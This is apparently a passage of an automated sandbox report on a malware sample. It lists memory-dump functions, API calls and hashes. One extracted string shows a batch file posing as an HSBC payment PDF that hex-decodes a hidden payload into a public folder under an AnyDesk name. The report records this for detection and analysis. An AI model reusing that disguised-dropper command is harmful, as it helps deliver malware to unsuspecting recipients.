                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction ID: ae6706625a2695a46215ad74246964e1af96132dc94ca0402fa9ed17e386f87d
                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction Fuzzy Hash: CAF08132E1AB4392EB548B15F840178B7A0FB8AB00B589035D90E83355CF3CE485D700
                                                                                          Function 00007FF6A0E84C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: exit
                                                                                          • String ID:
                                                                                          • API String ID: 2483651598-0
                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction ID: a5faabaf9eb885b14219be0b802b51cd4044051a8ec45e5ae1fcbda3fcf4e747
                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction Fuzzy Hash: 10C08C70B0A647ABFB2C6B71289103D99E9BF4D302F05683CCA0BC1382EE2CD80C9200
                                                                                          Function 00007FF6A0E85508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultUser
                                                                                          • String ID:
                                                                                          • API String ID: 3358694519-0
                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction ID: 05a93d95d120a1b8f572d343fdd5040c973b049c9a3fe1b9f0d18eb7b4895aea
                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction Fuzzy Hash: 44E02BF3D0A253ABF5582F4160413F41953FB7A783FC44031D70D817C04D2D28457208
                                                                                          Function 00007FF6A0E82E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction ID: 5de4b03ae947725fb72120dae8bd24d2aabe88b2246520cbd8cfe5316431820a
                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction Fuzzy Hash: FDF0E231B0A78351FA408B56B9401296290AF88BF0F088334EF7D87BC9EE3CD4528300

                                                                                          Non-executed Functions

                                                                                          Function 00007FF6A0E97F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F44
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E97F5C
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F9E
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97FFF
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98020
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98036
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98061
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98075
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E980D6
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E980EA
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98177
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9819A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981BD
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981DC
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981FB
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9821A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98239
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98291
                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982D7
                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982FB
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9831A
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98364
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98378
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9839A
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983AE
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983E6
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98403
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98418
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                          • API String ID: 3637805771-3100821235
                                                                                          • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction ID: 667d13eb1a9a7d81c2d73f7e9bab80e0b4037ced7dca74167b9658d734861781
                                                                                          • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction Fuzzy Hash: 79E1A272A0A693AAE7108F65E900179BBB1FB4DBD5B549231DD1E937A0DF3CA405E700
                                                                                          Function 00007FF6A0E76EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 1795611712-3662956551
                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction ID: 352548f889852567d24aceffab15a8bbe482478e072a27fee47c09ea6970b0f6
                                                                                          • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction Fuzzy Hash: 93E1AF72E0E643A6EB508F64A8406F9A7A1FF49788F944132E94ED7796DF3CE504E340
                                                                                          Function 00007FF6A0E71560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                          • String ID: \\?\
                                                                                          • API String ID: 628682198-4282027825
                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction ID: c421523efc415085dede0690023eb7b97bf1ef95be863617260879444463929b
                                                                                          • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction Fuzzy Hash: 88E18D32B0A783A6EB649F24D8502F963A1FB89749F445139EA0E877D5EF3CE549D300
                                                                                          Function 00007FF6A0E7CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk, xrefs: 00007FF6A0E8C9F1
                                                                                          • GOTO, xrefs: 00007FF6A0E7D0A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                          • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk$GOTO
                                                                                          • API String ID: 3863671652-182410556
                                                                                          • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                                                          • Instruction ID: 0ffa25dec4ac35a407d619121735f3715ed87d0b518fb84cf06155fa83726f4c
                                                                                          • Opcode Fuzzy Hash: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                                                          • Instruction Fuzzy Hash: 30E19D32E0F683A6FA649B25A4543B966A1FF8A750F544139DA1EC23D2DF3CE845A700
                                                                                          Function 00007FF6A0E7372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                          • String ID: COPYCMD$\
                                                                                          • API String ID: 3989487059-1802776761
                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                          • Instruction ID: 9f2aa5cf0865cdfd7e234e21ca3244d37e17bc5270b28c6447b3094c70056cde
                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                          • Instruction Fuzzy Hash: 9FF1D576B0A787A1EA649B25D4402BAA3A0FF49BC8F148135DE4E87795EF3CE445E300
                                                                                          Function 00007FF6A0E83140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                          • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                          • API String ID: 55602301-2548490036
                                                                                          • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                          • Instruction ID: 4fface3044e28e1a012421e08aaaa3b72b1c64a5e24605b3628407a8f93d4631
                                                                                          • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                          • Instruction Fuzzy Hash: ABA1C472A1A743E6EB208F10E4502BA77B5FB98754F504136EA5E83794EF7CE548E700
                                                                                          Function 00007FF6A0EA1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 3935429995-0
                                                                                          • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                          • Instruction ID: e239a4b13c2432d97a80d6835260837ee77f12c1ccb578403ad5e12e1ba6e3a1
                                                                                          • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                          • Instruction Fuzzy Hash: 4E61C036A0966392E714DF21A404679BBB4FF8DF96F259175EE4A83790EF3CD4019700
                                                                                          Function 00007FF6A0E735B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                          • Instruction ID: cc55a70b1ef88f189a443a5ee06ccb06b466f31c0abfcdd74b439412a4ceda93
                                                                                          • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                          • Instruction Fuzzy Hash: 9391B132A0A683A6EB648F35D8102FDB6A0FB89B85F054135DA4F87794EF3CD545E300
                                                                                          Function 00007FF6A0E72220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
